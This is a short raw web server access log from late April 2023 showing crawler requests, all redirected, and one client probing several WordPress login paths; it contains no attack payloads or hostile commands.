66.249.71.178 - - [26/Apr/2023:19:05:33 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
103.131.71.224 - - [27/Apr/2023:14:37:12 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
159.89.37.165 - - [27/Apr/2023:15:08:35 +0700] "HEAD / HTTP/1.1" 302 - "https://www.bing.com" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36"
159.89.37.165 - - [27/Apr/2023:15:08:37 +0700] "GET /wp-login.php HTTP/1.1" 302 229 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36"
159.89.37.165 - - [27/Apr/2023:15:08:39 +0700] "GET /wordpress/wp-login.php HTTP/1.1" 302 239 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36"
159.89.37.165 - - [27/Apr/2023:15:08:39 +0700] "GET /blog/wp-login.php HTTP/1.1" 302 234 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36"
159.89.37.165 - - [27/Apr/2023:15:08:40 +0700] "GET /wp/wp-login.php HTTP/1.1" 302 232 "http://xaydung.vanlanguni.edu.vn" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36"
66.249.71.212 - - [27/Apr/2023:18:35:45 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.214 - - [27/Apr/2023:18:35:45 +0700] "GET /ads.txt HTTP/1.1" 302 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
180.163.220.45 - - [27/Apr/2023:23:16:31 +0700] "GET / HTTP/1.1" 302 217 "-" "-"
180.163.220.47 - - [27/Apr/2023:23:17:59 +0700] "GET /sitemap.xml HTTP/1.1" 302 228 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
45.120.80.50 - - [28/Apr/2023:06:28:27 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
45.120.80.50 - - [28/Apr/2023:06:28:28 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36"
103.131.71.151 - - [28/Apr/2023:08:13:41 +0700] "GET /robots.txt HTTP/1.1" 302 227 "-" "Mozilla/5.0 (compatible; coccocbot-web/1.0; +http://help.coccoc.com/searchengine)"
116.63.165.124 - - [28/Apr/2023:09:15:52 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"
116.63.165.10 - - [28/Apr/2023:09:16:13 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"
116.63.165.10 - - [28/Apr/2023:09:16:16 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"
124.70.89.241 - - [28/Apr/2023:09:16:37 +0700] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36"
